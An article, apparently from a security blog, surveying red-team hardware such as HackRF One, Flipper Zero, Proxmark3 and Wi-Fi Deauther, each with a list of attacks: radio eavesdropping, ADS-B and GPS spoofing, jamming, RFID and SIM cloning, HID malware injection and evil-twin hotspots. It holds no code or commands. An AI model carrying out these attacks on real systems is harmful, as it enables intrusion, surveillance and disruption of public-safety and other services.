Red Teamer Gadgets (Part 1)

19 August 2024 16 minutes Author: Lady Liberty

In the first part of our review, we look at the main USB gadgets used by red teamers for cyber security testing. Learn more about devices like Bash Bunny and Rubber Ducky that allow you to automate attacks and run complex pentests. Learning these tools will help you improve your organization’s defenses against potential threats.

Let’s start

Cyber ​​security professionals, known as red teamers, use a variety of tools to simulate attacks and test organizations’ defenses. The Hacker’s Hardware Toolkit on GitHub, curated by yadox666, contains a collection of such devices. For example, Hak5’s Bash Bunny and USB Rubber Ducky help automate USB attacks, while WiFi Pineapple allows you to intercept and manipulate wireless traffic, making it indispensable for Wi-Fi security testing.

In addition, the toolkit includes RF analysis devices such as the HackRF One and testing of RFID/NFC systems with Proxmark3. Raspberry Pi and Arduino boards are also widely used to create custom solutions designed for physical and network attacks. This kit highlights the importance of both standard and customizable gadgets in the work of red teamers, providing a comprehensive approach to security assessment.

RTL-SDR v.3

RTL-SDR v.3 — is a popular and versatile software-defined radio (SDR) in USB stick format, known for its compatibility and reliable performance. It features an RTL2832U chip, an R820T2 tuner, a 1PPM TCXO, an SMA F-connector and is housed in an aluminum case with passive cooling. The device supports a frequency range of 500 kHz to 1.7 GHz with a bandwidth of up to 3.2 MHz, operating stably at 2.4 MHz. In direct sampling mode, it can also be tuned to RF frequencies.

RTL-SDR v.3 is compatible with various operating systems including Windows, OSX, Linux and Android and supports numerous SDR applications such as SDR#, HDSDR, SDR-Radio, GQRX and SDR Touch. This receiver is ideal for radio scanning, air traffic monitoring, public safety, ADS-B work, radio astronomy and many other tasks. It can also serve as an inexpensive adapter for radio amateurs.

The V3 model has received several upgrades, including an improved R820T2 tuner, 1PPM TCXO, a low-noise PCB, improved cooling, additional ESD protection, and the ability to power active antennas via a software tee.

Attack scenario:

Red teams can use RTL-SDR v.3 to intercept and analyze a wide range of wireless communications within its frequency capabilities. During penetration testing, the device allows the interception of unencrypted transmissions such as aviation systems, public safety channels or trunked radio networks. Using appropriate software, red commanders can monitor these communications in real time, identify vulnerabilities and potentially obtain sensitive information, and detect unauthorized transmissions or jamming, increasing situational awareness.

List of red team attacks

  1. Interception of Air Traffic Control Messages: Capture and analyze unencrypted air traffic control signals to gather flight intelligence.

  2. Monitor Public Safety Channels: Eavesdrop on police, fire, and EMS for real-time operational details.

  3. ADS-B Aviation Radar: Track aircraft movements and potentially generate confidential flight plans or cargo details.

  4. Trunked radio systems: Intercept and decode messages on trunked radio networks used by large organizations and government agencies.

  5. P25/MotoTRBO Digital Voice: Decode encrypted or unencrypted digital voice used in secure radio systems.

  6. ACARS Data Collection: Extract system messages from the Communication Addressing and Reporting System for flight data analysis.

  7. Weather Ball Telemetry: Intercept and decode telemetry data from a weather ball to study environmental monitoring techniques.

  8. NOAA APT/Meteor M2 satellites: Capture meteorological satellite images and transmit data for analysis.

HackRF One

The HackRF One from Great Scott Gadgets is a multi-functional Software Defined Radio (SDR) that can both transmit and receive signals in the 1 MHz to 6 GHz frequency range. This open-source device supports half-duplex operation, processing up to 20 million samples per second. It is compatible with popular SDR software such as GNU Radio and SDR# and provides software adjustable RX and TX gain. The HackRF One can be operated via USB or offline, has SMA connectors and programmable user buttons.

Attack scenario:

Red teams can use HackRF One for attacks that require simultaneous reception and transmission of radio signals. For example, the device could be used to spoof signals in systems such as ADS-B, resulting in false records in aircraft tracking systems. In addition, HackRF One can be used to jam or disrupt wireless systems such as Wi-Fi or Bluetooth, as well as to perform signal playback attacks that allow unauthorized access to various systems. Its extensive capabilities make this device a powerful tool for detecting and exploiting vulnerabilities in radio systems.

List of red team attacks

  • Signal spoofing: Transmitting false signals to mislead a receiver, such as spoofing ADS-B aircraft positions or GPS signals.

  • Jamming attacks: Disrupt communication channels such as Wi-Fi, Bluetooth, or public safety frequencies by transmitting jamming signals.

  • Replay attacks: capturing and retransmitting legitimate signals to gain unauthorized access to systems, such as keyless access systems.

  • Wireless Protocol Analysis: Intercept and analyze your own wireless communication to identify vulnerabilities.

  • SDR Application Testing: Develop and test custom radio applications or proof-of-concept experiments targeting specific radio technologies.

  • Frequency Hopping Attacks: Analyze and disrupt Frequency Hopping Spread Spectrum (FHSS) systems by predicting frequency hopping sequences.

  • Use of RFID and NFC: Interception and manipulation of RFID or NFC communications for unauthorized access or data extraction.

  • Broadcast signal manipulation: Injecting false information into broadcast systems such as FM radio or digital television.

  • Remote control interception: Capture and copy signals from remote controls to control devices such as garage doors or drones.

Flipper Zero

Flipper Zero is a compact, multi-functional device designed for hackers, pentesters and electronics enthusiasts. It supports RFID, NFC, infrared transceiver, GPIO and low frequency transceiver, making it a versatile tool for various tasks. Thanks to the open source code, Flipper Zero can be customized and extended, allowing you to adapt the device to your specific needs. This gadget is suitable for cloning access cards, intercepting IR signals and analyzing wireless communications, making it ideal for security testing.

Attack scenario:

Red teams can use Flipper Zero to clone RFID and NFC cards, intercept infrared signals, and conduct replay attacks targeting wireless systems. Its flexibility allows you to interact with various electronic systems, testing them for vulnerabilities.

List of red team attacks

  1. RFID Cloning: Capturing and copying the signals of RFID cards to gain unauthorized access to secure areas.

  2. NFC Manipulation: Read, write and emulate NFC tags to interact with contactless payment systems or access control systems.

  3. Infrared signal replication: Capture and transmit infrared signals from remote controls to control devices with an IR port.

  4. Wireless Interception: Use a sub-1 GHz transceiver to intercept and analyze wireless communications for vulnerabilities.

  5. Repeat attacks: Record and play back signals from keyless entry systems to unlock vehicles or buildings.

  6. GPIO Interface: Connect to and control electronic systems using GPIO pins for hardware testing and operation.

  7. Custom Firmware Development: Create and deploy custom firmware to extend Flipper Zero’s functionality for specific attack scenarios.

  8. Signal jamming: Disrupt communications by transmitting noise or jamming signals in supported frequency bands.

  9. Bluetooth Exploitation: Intercept and manipulate Bluetooth connections to access and control Bluetooth-enabled devices.

M5StickC Plus

M5StickC Plus — is a compact development board from M5Stack that is based on an ESP32 microcontroller with Wi-Fi and Bluetooth support. It has a 1.14-inch TFT display, an IMU sensor, a built-in battery and several GPIO pins for expansion. With support for Arduino, MicroPython and UIFlow, this device is ideal for IoT projects and rapid prototyping.

Attack scenario:

The M5StickC Plus can be used to create rogue Wi-Fi access points, deauthentication attacks, intercept Bluetooth connections, as well as directly access hardware systems via GPIO, allowing testing and manipulation of devices in real-world environments.

List of red team attacks

  1. Fake Access Point: Set up a fake Wi-Fi access point to capture credentials and monitor network traffic.

  2. Wi-Fi Deauthentication Attack: Disrupt legitimate Wi-Fi connections by sending deauthentication frames to connected devices.

  3. Bluetooth interception: Intercept and manipulate Bluetooth connections to gain unauthorized access to Bluetooth-enabled devices.

  4. Custom Payload Deployment: Program the device to deploy custom payloads or scripts for automated attacks on network systems.

  5. Hardware Manipulation: Use GPIO pins to interact with and use hardware systems such as sensors or control units.

  6. Credential collection: Collect and store credentials from Wi-Fi networks or Bluetooth devices.

  7. Network Scan: Perform a Wi-Fi or Bluetooth scan to identify and number devices and networks in range.

  8. Sensor Spoofing: Manipulate incoming sensor data to disrupt or mislead systems that rely on accurate sensor data.

  9. Data theft: Use Wi-Fi or Bluetooth to extract sensitive data from compromised systems.

Los Digispark ATTINY85 Micro USB Dev Board Arduino

The Los Digispark ATTINY85 Micro USB Dev Board is a small, cost-effective development board based on the ATTINY85 microcontroller, equipped with micro USB for programming and power, six I/O pins, and Arduino IDE support. It operates at 8 or 16 MHz, making it ideal for compact projects and prototypes.

Attack scenario:

Red teams can use Digispark ATTINY85 for covert attacks, such as as a malicious USB keyboard to enter commands or install malware, thanks to its small size and ability to be hidden.

List of red team attacks

  1. HID Injection Attack: Program a device to act as a USB keyboard, injecting malicious keystrokes to execute commands or scripts on the target system.

  2. Credential harvesting: Use HID capabilities to open terminal or browser windows and extract credentials or sensitive information.

  3. Deploying Malware: Automate the installation of malware by entering commands that download and execute the malware.

  4. Data theft: Set up your device to steal data by entering sensitive information and sending it via email or uploading it to cloud services.

  5. Automated exploits: Deploy automated exploits or payloads that exploit known vulnerabilities on the target system.

  6. Network Configuration Manipulation: Use HID capabilities to change network settings or introduce false configurations on a target system.

  7. Phishing attacks: Open phishing websites or fake login pages with keystrokes entered to capture user credentials.

  8. System reconfiguration: Change system settings or configurations to weaken security measures or build resilience against future attacks.

  9. Wireless Network Attacks: Interface with external Wi-Fi or Bluetooth modules to perform wireless network attacks such as rogue access points or deauthentication.

Альфа AWUS-036ACH

The Alfa AWUS-036ACH is a high-performance dual-band wireless USB adapter that provides excellent Wi-Fi connectivity on both 2.4GHz and 5GHz. Supporting the 802.11ac standard, it can transfer data at speeds of up to 300Mbps on 2.4GHz and up to 867Mbps on 5GHz. The adapter has a USB 3.0 interface and is equipped with two highly sensitive antennas that improve signal and coverage. It’s compatible with Windows, MacOS and Linux, making it ideal for a variety of tasks, from streaming video to downloading large files.

Attack scenario:

Red teams can use the Alfa AWUS-036ACH to conduct Wi-Fi attacks such as packet analysis, network traffic capture and vulnerability detection. With support for 2.4GHz and 5GHz frequencies, the adapter allows you to explore weaknesses in Wi-Fi protocols and create rogue access points or perform man-in-the-middle attacks by intercepting and manipulating user data.

List of red team attacks

  1. Packet sniffing: Collect and analyze network traffic for sensitive information, credentials, or vulnerabilities.

  2. Fake hotspot: Set up a fake Wi-Fi hotspot to intercept and manipulate network traffic from unsuspecting users.

  3. Deauthentication attack: Interrupt legitimate Wi-Fi connections by sending deauthentication frames to connected devices.

  4. Man-in-the-Middle (MITM) attack: Intercepting and altering communication between devices on a network to steal data or inject malicious content.

  5. Evil Twin Attack: Clone a legitimate Wi-Fi network to trick users into connecting to a malicious hotspot.

  6. Wi-Fi Jamming: Sending jamming signals to disrupt Wi-Fi communications and create denial of service conditions.

  7. Credential harvesting: Collect login credentials and other sensitive information from intercepted network traffic.

  8. WEP/WPA/WPA2 Cracking: Use the adapter’s capabilities to break weak Wi-Fi encryption and gain unauthorized access to secure networks.

  9. Network Scan: Identify and list nearby Wi-Fi networks, devices and their security configurations for later reference.

Wi-Fi Deauther

The Wi-Fi Deauther is a compact device based on an ESP8266 microcontroller designed to selectively disconnect devices from a 2.4 GHz Wi-Fi network. It exploits a vulnerability in the Wi-Fi standard (802.11) to send deauthentication packets, which causes devices to disconnect without creating general interference. Equipped with OLED display, 18650 battery charger and pre-installed ESP8266 Deauther software, this tool is essential for network testing.

Attack scenario:

Red Commander can use Wi-Fi Deauther for selective attacks, disconnecting target devices from the Wi-Fi network to analyze network stability or capture authentication handshakes. Thanks to its compact size and display, it is convenient for covert operations and monitoring.

List of red team attacks

  1. Deauthentication Attack: Disrupts network connectivity for target devices by sending deauthentication packets, causing them to disconnect from the network.

  2. Handshake Capture: Force reconnect devices to network, capture WPA/WPA2 handshakes for offline hacking.

  3. Targeted network disruption: Selectively disable specific devices without affecting the entire network, useful for isolating and testing the security of individual systems.

  4. Client-Side Denial of Service: Persistently deauthenticate certain clients, effectively preventing them from maintaining a stable connection to the network.

  5. Detect rogue access points: Use deauth packets to identify rogue access points by observing their response to an attack.

  6. Access Point Testing: Assessing the robustness of access points against deauthentication attacks and other Wi-Fi vulnerabilities.

  7. Security Training: Demonstrate the impact of deauthentication attacks in security training sessions to educate users about Wi-Fi security.

  8. Network Intelligence: Identify active devices on the network and their corresponding access points by observing deauthorization responses.

  9. Evasion tactic: Use deauth packets to temporarily disable security cameras or other monitoring devices that rely on Wi-Fi connectivity.

Proxmark3-EVO

Proxmark3-EVO is a high-tech tool for analyzing and testing RFID systems, supporting both low-frequency (125/134 kHz) and high-frequency (13.56 MHz) protocols. The device is equipped with a powerful processor AT91SAM7S512, internal and external memory, as well as pre-configured antennas for LF and HF frequencies. It allows reading, writing, cloning, emulation and analysis of RFID cards and tags.

Attack scenario:

Red teams can use Proxmark3-EVO to clone RFID cards, intercept signals and perform cryptographic attacks, allowing unauthorized access to secure areas or stealing sensitive data.

List of red team attacks

  1. RFID Cloning: Clone RFID cards to gain unauthorized access to secure areas or facilities.

  2. RFID emulation: Emulate RFID cards to impersonate legitimate users and bypass access control systems.

  3. Signal Replay: Capture and replay RFID signals to spoof access credentials and gain access to restricted areas.

  4. RFID Snooping: Intercept and analyze RFID communications to obtain data exchanged between RFID readers and tags.

  5. Cryptographic Attacks: Perform cryptographic attacks to crack RFID encryption keys and authenticate as valid users.

  6. Data Extraction: The extraction of sensitive information stored on RFID tags, such as personal data or payment data.

  7. Protocol Analysis: Analyze RFID protocols to identify vulnerabilities and weaknesses in RFID implementations.

  8. Brute Force Attacks: Use Proxmark3-EVO to perform brute force attacks on RFID systems to guess PINs or authentication codes.

  9. RFID tag cloning: Clone specific RFID tags for testing or use to demonstrate vulnerabilities.

SIM/SAM extension for Proxmark3 RDV4

The Proxmark3 RDV4 SIM/SAM Extension is a specialized module that adds SIM and SAM capabilities to the Proxmark3 RDV4 device. It allows researchers and pentesters to analyze, program and manipulate the data on the cards, including cryptographic keys and PINs. This extension enables sophisticated attacks such as SIM card cloning, which is critical for assessing the security of telecommunications and financial systems.

Attack scenario:

With this module, red teams can extract sensitive information, including cryptographic keys and PIN codes, which can lead to SIM card cloning and unauthorized access to cellular networks or secure access control systems.

List of red team attacks

  1. Data Extraction: Extraction of sensitive information such as IMSI (International Mobile Subscriber Identity) or authentication keys from SIM cards.

  2. SIM Cloning: Clone SIM cards to impersonate legitimate users and gain unauthorized access to cellular networks.

  3. PIN manipulation: Manipulate SIM PINs to bypass authentication or disable security features.

  4. Bypass Authentication: Use extracted credentials to bypass authentication mechanisms and gain access to secure systems.

  5. Man-in-the-Middle (MITM) attacks: Intercept and modify communications between SIM cards and network operators to eavesdrop or inject malicious content.

  6. SIM Toolkit (STK) Exploitation: Exploit vulnerabilities in SIM Toolkit applications to perform actions on behalf of a user without their knowledge.

  7. Secure Element Analysis: Security analysis of SAMs used in access control systems to detect vulnerabilities or backdoor access.

  8. Cryptographic attacks: Perform cryptographic attacks to break the encryption keys used to secure communications between SIM cards and network operators.

  9. Forensic Analysis: Use SIM/SAM extensions for forensics to recover deleted or hidden data from SIM cards used in criminal activity.

125 KHz RFID Cloner / 13.56 MHz RFID/NFC Reader/Writer

125KHz RFID Cloner and 13.56MHz RFID/NFC Reader/Writer is a device capable of cloning RFID cards and reading/writing NFC tags. It supports card cloning based on EM4100, HID and AWID protocols, as well as writing to T5577 tags. It works autonomously, has built-in LED indicators and a buzzer for feedback. Compatible with many RFID standards, the device is easy to use.

Attack scenario:

Red teams can use this device to clone access cards, gaining unauthorized access, or implant malicious NFC tags for malicious activities. Its portability makes it easy to use in covert operations.

List of red team attacks

  1. RFID Card Cloning: Clone RFID cards (EM4100, HID, AWID) to gain unauthorized access to buildings or facilities.

  2. Access Control Bypass: Use cloned RFID cards to bypass physical access controls and enter restricted areas.

  3. Tampering with NFC tags: Write malicious data into NFC tags to exploit vulnerabilities in NFC-enabled systems or devices.

  4. Impersonation Attacks: Clone RFID cards to impersonate and act on behalf of authorized personnel.

  5. Physical Security Testing: Assess the effectiveness of RFID-based security systems by testing cloned credentials for access control.

  6. Social Engineering: Use cloned credentials to facilitate social engineering attacks by gaining trust or access under false pretenses.

  7. Delivery of malware: Use NFC tags to deliver malware or malicious scripts to NFC-enabled devices during scanning.

  8. Asset tracking.Use NFC tags for tracking by inserting them into objects to monitor their movement through NFC-enabled control points.

  9. Data theft: Hide stolen data on NFC tags for later retrieval or transmit sensitive information via NFC channels.

Other related articles
Found an error?
If you find an error, take a screenshot and send it to the bot.